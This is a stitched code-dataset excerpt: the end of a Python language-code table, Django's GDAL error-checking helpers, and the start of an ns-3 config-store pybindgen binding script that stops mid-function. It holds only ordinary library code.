LanguageCodes["nno"] = LanguageCodes["nn"] = ("Norwegian Nynorsk", "")
LanguageCodes["nob"] = LanguageCodes["nb"] = ("Norwegian Bokmål", "")
LanguageCodes["non"] = ("Norse, Old", "")
LanguageCodes["nor"] = LanguageCodes["no"] = ("Norwegian", "Germanic")
LanguageCodes["nso"] = ("Sotho, Northern", "")
LanguageCodes["nub"] = ("Nubian languages", "")
LanguageCodes["nya"] = LanguageCodes["ny"] = ("Chichewa; Nyanja", "")
LanguageCodes["nym"] = ("Nyamwezi", "")
LanguageCodes["nyn"] = ("Nyankole", "")
LanguageCodes["nyo"] = ("Nyoro", "")
LanguageCodes["nzi"] = ("Nzima", "")
LanguageCodes["oci"] = LanguageCodes["oc"] = ("Occitan (post 1500); Provençal", "Romance")
LanguageCodes["oji"] = ("Ojibwa", "")
LanguageCodes["ori"] = LanguageCodes["or"] = ("Oriya", "Indian")
LanguageCodes["orm"] = LanguageCodes["om"] = ("Oromo", "Hamitic")
LanguageCodes["osa"] = ("Osage", "")
LanguageCodes["oss"] = LanguageCodes["os"] = ("Ossetian; Ossetic", "")
LanguageCodes["ota"] = ("Turkish, Ottoman (1500-1928)", "")
LanguageCodes["oto"] = ("Otomian languages", "")
LanguageCodes["paa"] = ("Papuan (Other)", "")
LanguageCodes["pag"] = ("Pangasinan", "")
LanguageCodes["pal"] = ("Pahlavi", "")
LanguageCodes["pam"] = ("Pampanga", "")
LanguageCodes["pan"] = LanguageCodes["pa"] = ("Panjabi", "Indian")
LanguageCodes["pap"] = ("Papiamento", "")
LanguageCodes["pau"] = ("Palauan", "")
LanguageCodes["peo"] = ("Persian, Old (ca. 600-400 b.c.)", "")
LanguageCodes["phi"] = ("Philippine (Other)", "")
LanguageCodes["pli"] = LanguageCodes["pi"] = ("Pali", "")
LanguageCodes["pol"] = LanguageCodes["pl"] = ("Polish", "Slavic")
LanguageCodes["pon"] = ("Pohnpeian", "")
LanguageCodes["por"] = LanguageCodes["pt"] = ("Portuguese", "Romance")
LanguageCodes["pra"] = ("Prakrit languages", "")
LanguageCodes["pro"] = ("Provençal, Old (to 1500)", "")
LanguageCodes["pus"] = LanguageCodes["ps"] = ("Pushto", "Iranian")
LanguageCodes["que"] = LanguageCodes["qu"] = ("Quechua", "Amerindian")
LanguageCodes["raj"] = ("Rajasthani", "")
LanguageCodes["rap"] = ("Rapanui", "")
LanguageCodes["rar"] = ("Rarotongan", "")
LanguageCodes["roa"] = ("Romance (Other)", "")
LanguageCodes["rom"] = ("Romany", "")
LanguageCodes["ron"] = LanguageCodes["rum"] = LanguageCodes["ro"] = ("Romanian", "Romance")
LanguageCodes["run"] = LanguageCodes["rn"] = ("Rundi", "Negro-african")
LanguageCodes["rus"] = LanguageCodes["ru"] = ("Russian", "Slavic")
LanguageCodes["sad"] = ("Sandawe", "")
LanguageCodes["sag"] = LanguageCodes["sg"] = ("Sango", "Negro-african")
LanguageCodes["sah"] = ("Yakut", "")
LanguageCodes["sai"] = ("South American Indian (Other)", "")
LanguageCodes["sal"] = ("Salishan languages", "")
LanguageCodes["sam"] = ("Samaritan Aramaic", "")
LanguageCodes["san"] = LanguageCodes["sa"] = ("Sanskrit", "Indian")
LanguageCodes["sas"] = ("Sasak", "")
LanguageCodes["sat"] = ("Santali", "")
LanguageCodes["sco"] = ("Scots", "")
LanguageCodes["sel"] = ("Selkup", "")
LanguageCodes["sem"] = ("Semitic (Other)", "")
LanguageCodes["sga"] = ("Irish, Old (to 900)", "")
LanguageCodes["sgn"] = ("Sign Languages", "")
LanguageCodes["shn"] = ("Shan", "")
LanguageCodes["sid"] = ("Sidamo", "")
LanguageCodes["sin"] = LanguageCodes["si"] = ("Sinhalese", "Indian")
LanguageCodes["sio"] = ("Siouan languages", "")
LanguageCodes["sit"] = ("Sino-Tibetan (Other)", "")
LanguageCodes["sla"] = ("Slavic (Other)", "")
LanguageCodes["slk"] = LanguageCodes["slo"] = LanguageCodes["sk"] = ("Slovak", "Slavic")
LanguageCodes["slv"] = LanguageCodes["sl"] = ("Slovenian", "Slavic")
LanguageCodes["sme"] = LanguageCodes["se"] = ("Northern Sami", "")
LanguageCodes["smi"] = ("Sami languages (Other)", "")
LanguageCodes["smo"] = LanguageCodes["sm"] = ("Samoan", "Oceanic/indonesian")
LanguageCodes["sna"] = LanguageCodes["sn"] = ("Shona", "Negro-african")
LanguageCodes["snd"] = LanguageCodes["sd"] = ("Sindhi", "Indian")
LanguageCodes["snk"] = ("Soninke", "")
LanguageCodes["sog"] = ("Sogdian", "")
LanguageCodes["som"] = LanguageCodes["so"] = ("Somali", "Hamitic")
LanguageCodes["son"] = ("Songhai", "")
LanguageCodes["sot"] = LanguageCodes["st"] = ("Sotho, Southern", "Negro-african")
LanguageCodes["esl"] = LanguageCodes["spa"] = LanguageCodes["es"] = ("Spanish", "Romance")
LanguageCodes["sqi"] = LanguageCodes["alb"] = LanguageCodes["sq"] = ("Albanian", "Indo-european (other)")
LanguageCodes["srd"] = LanguageCodes["sc"] = ("Sardinian", "")
LanguageCodes["srp"] = LanguageCodes["scc"] = LanguageCodes["sr"] = ("Serbian", "Slavic")
LanguageCodes["srr"] = ("Serer", "")
LanguageCodes["ssa"] = ("Nilo-Saharan (Other)", "")
LanguageCodes["ssw"] = LanguageCodes["ss"] = ("Swati", "Negro-african")
LanguageCodes["suk"] = ("Sukuma", "")
LanguageCodes["sun"] = LanguageCodes["su"] = ("Sundanese", "Oceanic/indonesian")
LanguageCodes["sus"] = ("Susu", "")
LanguageCodes["sux"] = ("Sumerian", "")
LanguageCodes["swa"] = LanguageCodes["sw"] = ("Swahili", "Negro-african")
LanguageCodes["swe"] = LanguageCodes["sv"] = ("Swedish", "Germanic")
LanguageCodes["syr"] = ("Syriac", "")
LanguageCodes["tah"] = LanguageCodes["ty"] = ("Tahitian", "")
LanguageCodes["tai"] = ("Tai (Other)", "")
LanguageCodes["tam"] = LanguageCodes["ta"] = ("Tamil", "Dravidian")
LanguageCodes["tat"] = LanguageCodes["tt"] = ("Tatar", "Turkic/altaic")
LanguageCodes["tel"] = LanguageCodes["te"] = ("Telugu", "Dravidian")
LanguageCodes["tem"] = ("Timne", "")
LanguageCodes["ter"] = ("Tereno", "")
LanguageCodes["tet"] = ("Tetum", "")
LanguageCodes["tgk"] = LanguageCodes["tg"] = ("Tajik", "Iranian")
LanguageCodes["tgl"] = LanguageCodes["tl"] = ("Tagalog", "Oceanic/indonesian")
LanguageCodes["tha"] = LanguageCodes["th"] = ("Thai", "Asian")
LanguageCodes["tig"] = ("Tigre", "")
LanguageCodes["tir"] = LanguageCodes["ti"] = ("Tigrinya", "Semitic")
LanguageCodes["tiv"] = ("Tiv", "")
LanguageCodes["tkl"] = ("Tokelau", "")
LanguageCodes["tli"] = ("Tlingit", "")
LanguageCodes["tmh"] = ("Tamashek", "")
LanguageCodes["tog"] = ("Tonga (Nyasa)", "")
LanguageCodes["ton"] = LanguageCodes["to"] = ("Tonga (Tonga Islands)", "Oceanic/indonesian")
LanguageCodes["tpi"] = ("Tok Pisin", "")
LanguageCodes["tsi"] = ("Tsimshian", "")
LanguageCodes["tsn"] = LanguageCodes["tn"] = ("Tswana", "Negro-african")
LanguageCodes["tso"] = LanguageCodes["ts"] = ("Tsonga", "Negro-african")
LanguageCodes["tuk"] = LanguageCodes["tk"] = ("Turkmen", "Turkic/altaic")
LanguageCodes["tum"] = ("Tumbuka", "")
LanguageCodes["tur"] = LanguageCodes["tr"] = ("Turkish", "Turkic/altaic")
LanguageCodes["tut"] = ("Altaic (Other)", "")
LanguageCodes["tvl"] = ("Tuvalu", "")
LanguageCodes["twi"] = LanguageCodes["tw"] = ("Twi", "Negro-african")
LanguageCodes["tyv"] = ("Tuvinian", "")
LanguageCodes["uga"] = ("Ugaritic", "")
LanguageCodes["uig"] = LanguageCodes["ug"] = ("Uighur", "")
LanguageCodes["ukr"] = LanguageCodes["uk"] = ("Ukrainian", "Slavic")
LanguageCodes["umb"] = ("Umbundu", "")
LanguageCodes["und"] = ("Undetermined", "")
LanguageCodes["urd"] = LanguageCodes["ur"] = ("Urdu", "Indian")
LanguageCodes["uzb"] = LanguageCodes["uz"] = ("Uzbek", "Turkic/altaic")
LanguageCodes["vai"] = ("Vai", "")
LanguageCodes["ven"] = ("Venda", "")
LanguageCodes["vie"] = LanguageCodes["vi"] = ("Vietnamese", "Asian")
LanguageCodes["vol"] = LanguageCodes["vo"] = ("Volapük", "International aux.")
LanguageCodes["vot"] = ("Votic", "")
LanguageCodes["wak"] = ("Wakashan languages", "")
LanguageCodes["wal"] = ("Walamo", "")
LanguageCodes["war"] = ("Waray", "")
LanguageCodes["was"] = ("Washo", "")
LanguageCodes["wen"] = ("Sorbian languages", "")
LanguageCodes["wol"] = LanguageCodes["wo"] = ("Wolof", "Negro-african")
LanguageCodes["xho"] = LanguageCodes["xh"] = ("Xhosa", "Negro-african")
LanguageCodes["yao"] = ("Yao", "")
LanguageCodes["yap"] = ("Yapese", "")
LanguageCodes["yid"] = LanguageCodes["yi"] = ("Yiddish", "")
LanguageCodes["yor"] = LanguageCodes["yo"] = ("Yoruba", "Negro-african")
LanguageCodes["ypk"] = ("Yupik languages", "")
LanguageCodes["zap"] = ("Zapotec", "")
LanguageCodes["zen"] = ("Zenaga", "")
LanguageCodes["zha"] = LanguageCodes["za"] = ("Zhuang", "")
LanguageCodes["zho"] = LanguageCodes["chi"] = LanguageCodes["zh"] = ("Chinese", "Asian")
LanguageCodes["znd"] = ("Zande", "")
LanguageCodes["zul"] = LanguageCodes["zu"] = ("Zulu", "Negro-african")
LanguageCodes["zun"] = ("Zuni", "")
| gpl-2.0 |
marcelocure/django | django/contrib/gis/gdal/prototypes/errcheck.py | 586 | 4229 | """
This module houses the error-checking routines used by the GDAL
ctypes prototypes.
"""
from ctypes import c_void_p, string_at
from django.contrib.gis.gdal.error import (
GDALException, SRSException, check_err,
)
from django.contrib.gis.gdal.libgdal import lgdal
from django.utils import six
# Helper routines for retrieving pointers and/or values from
# arguments passed in by reference.
def arg_byref(args, offset=-1):
"Returns the pointer argument's by-reference value."
return args[offset]._obj.value
def ptr_byref(args, offset=-1):
"Returns the pointer argument passed in by-reference."
return args[offset]._obj
# ### String checking Routines ###
def check_const_string(result, func, cargs, offset=None, cpl=False):
"""
Similar functionality to `check_string`, but does not free the pointer.
"""
if offset:
check_err(result, cpl=cpl)
ptr = ptr_byref(cargs, offset)
return ptr.value
else:
return result
def check_string(result, func, cargs, offset=-1, str_result=False):
"""
Checks the string output returned from the given function, and frees
the string pointer allocated by OGR. The `str_result` keyword
may be used when the result is the string pointer, otherwise
the OGR error code is assumed. The `offset` keyword may be used
to extract the string pointer passed in by-reference at the given
slice offset in the function arguments.
"""
if str_result:
# For routines that return a string.
ptr = result
if not ptr:
s = None
else:
s = string_at(result)
else:
# Error-code return specified.
check_err(result)
ptr = ptr_byref(cargs, offset)
# Getting the string value
s = ptr.value
# Correctly freeing the allocated memory behind GDAL pointer
# with the VSIFree routine.
if ptr:
lgdal.VSIFree(ptr)
return s
# ### DataSource, Layer error-checking ###
# ### Envelope checking ###
def check_envelope(result, func, cargs, offset=-1):
"Checks a function that returns an OGR Envelope by reference."
env = ptr_byref(cargs, offset)
return env
# ### Geometry error-checking routines ###
def check_geom(result, func, cargs):
"Checks a function that returns a geometry."
# OGR_G_Clone may return an integer, even though the
# restype is set to c_void_p
if isinstance(result, six.integer_types):
result = c_void_p(result)
if not result:
raise GDALException('Invalid geometry pointer returned from "%s".' % func.__name__)
return result
def check_geom_offset(result, func, cargs, offset=-1):
"Chcks the geometry at the given offset in the C parameter list."
check_err(result)
geom = ptr_byref(cargs, offset=offset)
return check_geom(geom, func, cargs)
# ### Spatial Reference error-checking routines ###
def check_srs(result, func, cargs):
if isinstance(result, six.integer_types):
result = c_void_p(result)
if not result:
raise SRSException('Invalid spatial reference pointer returned from "%s".' % func.__name__)
return result
# ### Other error-checking routines ###
def check_arg_errcode(result, func, cargs, cpl=False):
"""
The error code is returned in the last argument, by reference.
Check its value with `check_err` before returning the result.
"""
check_err(arg_byref(cargs), cpl=cpl)
return result
def check_errcode(result, func, cargs, cpl=False):
"""
Check the error code returned (c_int).
"""
check_err(result, cpl=cpl)
def check_pointer(result, func, cargs):
"Makes sure the result pointer is valid."
if isinstance(result, six.integer_types):
result = c_void_p(result)
if result:
return result
else:
raise GDALException('Invalid pointer returned from "%s"' % func.__name__)
def check_str_arg(result, func, cargs):
"""
This is for the OSRGet[Angular|Linear]Units functions, which
require that the returned string pointer not be freed. This
returns both the double and string values.
"""
dbl = result
ptr = cargs[-1]._obj
return dbl, ptr.value.decode()
| bsd-3-clause |
sergiosvieira/ns3-dtn | src/config-store/bindings/modulegen__gcc_LP64.py | 34 | 54509 | from pybindgen import Module, FileCodeSink, param, retval, cppclass, typehandlers
import pybindgen.settings
import warnings
class ErrorHandler(pybindgen.settings.ErrorHandler):
def handle_error(self, wrapper, exception, traceback_):
warnings.warn("exception %r in wrapper %s" % (exception, wrapper))
return True
pybindgen.settings.error_handler = ErrorHandler()
import sys
def module_init():
root_module = Module('ns.config_store', cpp_namespace='::ns3')
return root_module
def register_types(module):
root_module = module.get_root()
## callback.h (module 'core'): ns3::CallbackBase [class]
module.add_class('CallbackBase', import_from_module='ns.core')
## file-config.h (module 'config-store'): ns3::FileConfig [class]
module.add_class('FileConfig', allow_subclassing=True)
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore [class]
module.add_class('GtkConfigStore')
## file-config.h (module 'config-store'): ns3::NoneFileConfig [class]
module.add_class('NoneFileConfig', parent=root_module['ns3::FileConfig'])
## object-base.h (module 'core'): ns3::ObjectBase [class]
module.add_class('ObjectBase', allow_subclassing=True, import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId [class]
module.add_class('TypeId', import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeFlag [enumeration]
module.add_enum('AttributeFlag', ['ATTR_GET', 'ATTR_SET', 'ATTR_CONSTRUCT', 'ATTR_SGC'], outer_class=root_module['ns3::TypeId'], import_from_module='ns.core')
## type-id.h (module 'core'): ns3::TypeId::AttributeInformation [struct]
module.add_class('AttributeInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## type-id.h (module 'core'): ns3::TypeId::TraceSourceInformation [struct]
module.add_class('TraceSourceInformation', import_from_module='ns.core', outer_class=root_module['ns3::TypeId'])
## empty.h (module 'core'): ns3::empty [class]
module.add_class('empty', import_from_module='ns.core')
## config-store.h (module 'config-store'): ns3::ConfigStore [class]
module.add_class('ConfigStore', parent=root_module['ns3::ObjectBase'])
## config-store.h (module 'config-store'): ns3::ConfigStore::Mode [enumeration]
module.add_enum('Mode', ['LOAD', 'SAVE', 'NONE'], outer_class=root_module['ns3::ConfigStore'])
## config-store.h (module 'config-store'): ns3::ConfigStore::FileFormat [enumeration]
module.add_enum('FileFormat', ['XML', 'RAW_TEXT'], outer_class=root_module['ns3::ConfigStore'])
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeChecker', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeChecker>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::AttributeValue', 'ns3::empty', 'ns3::DefaultDeleter<ns3::AttributeValue>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::CallbackImplBase', 'ns3::empty', 'ns3::DefaultDeleter<ns3::CallbackImplBase>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## simple-ref-count.h (module 'core'): ns3::SimpleRefCount<ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> > [class]
module.add_class('SimpleRefCount', automatic_type_narrowing=True, import_from_module='ns.core', template_parameters=['ns3::TraceSourceAccessor', 'ns3::empty', 'ns3::DefaultDeleter<ns3::TraceSourceAccessor>'], parent=root_module['ns3::empty'], memory_policy=cppclass.ReferenceCountingMethodsPolicy(incref_method='Ref', decref_method='Unref', peekref_method='GetReferenceCount'))
## trace-source-accessor.h (module 'core'): ns3::TraceSourceAccessor [class]
module.add_class('TraceSourceAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeAccessor [class]
module.add_class('AttributeAccessor', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
## attribute.h (module 'core'): ns3::AttributeChecker [class]
module.add_class('AttributeChecker', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
## attribute.h (module 'core'): ns3::AttributeValue [class]
module.add_class('AttributeValue', allow_subclassing=False, automatic_type_narrowing=True, import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
## callback.h (module 'core'): ns3::CallbackChecker [class]
module.add_class('CallbackChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## callback.h (module 'core'): ns3::CallbackImplBase [class]
module.add_class('CallbackImplBase', import_from_module='ns.core', parent=root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
## callback.h (module 'core'): ns3::CallbackValue [class]
module.add_class('CallbackValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## attribute.h (module 'core'): ns3::EmptyAttributeValue [class]
module.add_class('EmptyAttributeValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## type-id.h (module 'core'): ns3::TypeIdChecker [class]
module.add_class('TypeIdChecker', import_from_module='ns.core', parent=root_module['ns3::AttributeChecker'])
## type-id.h (module 'core'): ns3::TypeIdValue [class]
module.add_class('TypeIdValue', import_from_module='ns.core', parent=root_module['ns3::AttributeValue'])
## Register a nested module for the namespace FatalImpl
nested_module = module.add_cpp_namespace('FatalImpl')
register_types_ns3_FatalImpl(nested_module)
def register_types_ns3_FatalImpl(module):
root_module = module.get_root()
def register_methods(root_module):
register_Ns3CallbackBase_methods(root_module, root_module['ns3::CallbackBase'])
register_Ns3FileConfig_methods(root_module, root_module['ns3::FileConfig'])
register_Ns3GtkConfigStore_methods(root_module, root_module['ns3::GtkConfigStore'])
register_Ns3NoneFileConfig_methods(root_module, root_module['ns3::NoneFileConfig'])
register_Ns3ObjectBase_methods(root_module, root_module['ns3::ObjectBase'])
register_Ns3TypeId_methods(root_module, root_module['ns3::TypeId'])
register_Ns3TypeIdAttributeInformation_methods(root_module, root_module['ns3::TypeId::AttributeInformation'])
register_Ns3TypeIdTraceSourceInformation_methods(root_module, root_module['ns3::TypeId::TraceSourceInformation'])
register_Ns3Empty_methods(root_module, root_module['ns3::empty'])
register_Ns3ConfigStore_methods(root_module, root_module['ns3::ConfigStore'])
register_Ns3SimpleRefCount__Ns3AttributeAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeAccessor, ns3::empty, ns3::DefaultDeleter<ns3::AttributeAccessor> >'])
register_Ns3SimpleRefCount__Ns3AttributeChecker_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeChecker__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeChecker, ns3::empty, ns3::DefaultDeleter<ns3::AttributeChecker> >'])
register_Ns3SimpleRefCount__Ns3AttributeValue_Ns3Empty_Ns3DefaultDeleter__lt__ns3AttributeValue__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::AttributeValue, ns3::empty, ns3::DefaultDeleter<ns3::AttributeValue> >'])
register_Ns3SimpleRefCount__Ns3CallbackImplBase_Ns3Empty_Ns3DefaultDeleter__lt__ns3CallbackImplBase__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::CallbackImplBase, ns3::empty, ns3::DefaultDeleter<ns3::CallbackImplBase> >'])
register_Ns3SimpleRefCount__Ns3TraceSourceAccessor_Ns3Empty_Ns3DefaultDeleter__lt__ns3TraceSourceAccessor__gt___methods(root_module, root_module['ns3::SimpleRefCount< ns3::TraceSourceAccessor, ns3::empty, ns3::DefaultDeleter<ns3::TraceSourceAccessor> >'])
register_Ns3TraceSourceAccessor_methods(root_module, root_module['ns3::TraceSourceAccessor'])
register_Ns3AttributeAccessor_methods(root_module, root_module['ns3::AttributeAccessor'])
register_Ns3AttributeChecker_methods(root_module, root_module['ns3::AttributeChecker'])
register_Ns3AttributeValue_methods(root_module, root_module['ns3::AttributeValue'])
register_Ns3CallbackChecker_methods(root_module, root_module['ns3::CallbackChecker'])
register_Ns3CallbackImplBase_methods(root_module, root_module['ns3::CallbackImplBase'])
register_Ns3CallbackValue_methods(root_module, root_module['ns3::CallbackValue'])
register_Ns3EmptyAttributeValue_methods(root_module, root_module['ns3::EmptyAttributeValue'])
register_Ns3TypeIdChecker_methods(root_module, root_module['ns3::TypeIdChecker'])
register_Ns3TypeIdValue_methods(root_module, root_module['ns3::TypeIdValue'])
return
def register_Ns3CallbackBase_methods(root_module, cls):
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::CallbackBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::CallbackBase const &', 'arg0')])
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase() [constructor]
cls.add_constructor([])
## callback.h (module 'core'): ns3::Ptr<ns3::CallbackImplBase> ns3::CallbackBase::GetImpl() const [member function]
cls.add_method('GetImpl',
'ns3::Ptr< ns3::CallbackImplBase >',
[],
is_const=True)
## callback.h (module 'core'): ns3::CallbackBase::CallbackBase(ns3::Ptr<ns3::CallbackImplBase> impl) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::CallbackImplBase >', 'impl')],
visibility='protected')
## callback.h (module 'core'): static std::string ns3::CallbackBase::Demangle(std::string const & mangled) [member function]
cls.add_method('Demangle',
'std::string',
[param('std::string const &', 'mangled')],
is_static=True, visibility='protected')
return
def register_Ns3FileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): ns3::FileConfig::FileConfig(ns3::FileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::FileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): void ns3::FileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_pure_virtual=True, is_virtual=True)
## file-config.h (module 'config-store'): void ns3::FileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_pure_virtual=True, is_virtual=True)
return
def register_Ns3GtkConfigStore_methods(root_module, cls):
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore(ns3::GtkConfigStore const & arg0) [copy constructor]
cls.add_constructor([param('ns3::GtkConfigStore const &', 'arg0')])
## gtk-config-store.h (module 'config-store'): ns3::GtkConfigStore::GtkConfigStore() [constructor]
cls.add_constructor([])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureAttributes() [member function]
cls.add_method('ConfigureAttributes',
'void',
[])
## gtk-config-store.h (module 'config-store'): void ns3::GtkConfigStore::ConfigureDefaults() [member function]
cls.add_method('ConfigureDefaults',
'void',
[])
return
def register_Ns3NoneFileConfig_methods(root_module, cls):
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig(ns3::NoneFileConfig const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NoneFileConfig const &', 'arg0')])
## file-config.h (module 'config-store'): ns3::NoneFileConfig::NoneFileConfig() [constructor]
cls.add_constructor([])
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Attributes() [member function]
cls.add_method('Attributes',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Default() [member function]
cls.add_method('Default',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::Global() [member function]
cls.add_method('Global',
'void',
[],
is_virtual=True)
## file-config.h (module 'config-store'): void ns3::NoneFileConfig::SetFilename(std::string filename) [member function]
cls.add_method('SetFilename',
'void',
[param('std::string', 'filename')],
is_virtual=True)
return
def register_Ns3ObjectBase_methods(root_module, cls):
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase() [constructor]
cls.add_constructor([])
## object-base.h (module 'core'): ns3::ObjectBase::ObjectBase(ns3::ObjectBase const & arg0) [copy constructor]
cls.add_constructor([param('ns3::ObjectBase const &', 'arg0')])
## object-base.h (module 'core'): void ns3::ObjectBase::GetAttribute(std::string name, ns3::AttributeValue & value) const [member function]
cls.add_method('GetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'value')],
is_const=True)
## object-base.h (module 'core'): bool ns3::ObjectBase::GetAttributeFailSafe(std::string name, ns3::AttributeValue & attribute) const [member function]
cls.add_method('GetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue &', 'attribute')],
is_const=True)
## object-base.h (module 'core'): ns3::TypeId ns3::ObjectBase::GetInstanceTypeId() const [member function]
cls.add_method('GetInstanceTypeId',
'ns3::TypeId',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## object-base.h (module 'core'): static ns3::TypeId ns3::ObjectBase::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## object-base.h (module 'core'): void ns3::ObjectBase::SetAttribute(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttribute',
'void',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::SetAttributeFailSafe(std::string name, ns3::AttributeValue const & value) [member function]
cls.add_method('SetAttributeFailSafe',
'bool',
[param('std::string', 'name'), param('ns3::AttributeValue const &', 'value')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceConnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceConnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnect(std::string name, std::string context, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnect',
'bool',
[param('std::string', 'name'), param('std::string', 'context'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): bool ns3::ObjectBase::TraceDisconnectWithoutContext(std::string name, ns3::CallbackBase const & cb) [member function]
cls.add_method('TraceDisconnectWithoutContext',
'bool',
[param('std::string', 'name'), param('ns3::CallbackBase const &', 'cb')])
## object-base.h (module 'core'): void ns3::ObjectBase::ConstructSelf(ns3::AttributeConstructionList const & attributes) [member function]
cls.add_method('ConstructSelf',
'void',
[param('ns3::AttributeConstructionList const &', 'attributes')],
visibility='protected')
## object-base.h (module 'core'): void ns3::ObjectBase::NotifyConstructionCompleted() [member function]
cls.add_method('NotifyConstructionCompleted',
'void',
[],
visibility='protected', is_virtual=True)
return
def register_Ns3TypeId_methods(root_module, cls):
cls.add_binary_comparison_operator('<')
cls.add_binary_comparison_operator('!=')
cls.add_output_stream_operator()
cls.add_binary_comparison_operator('==')
## type-id.h (module 'core'): ns3::TypeId::TypeId(char const * name) [constructor]
cls.add_constructor([param('char const *', 'name')])
## type-id.h (module 'core'): ns3::TypeId::TypeId() [constructor]
cls.add_constructor([])
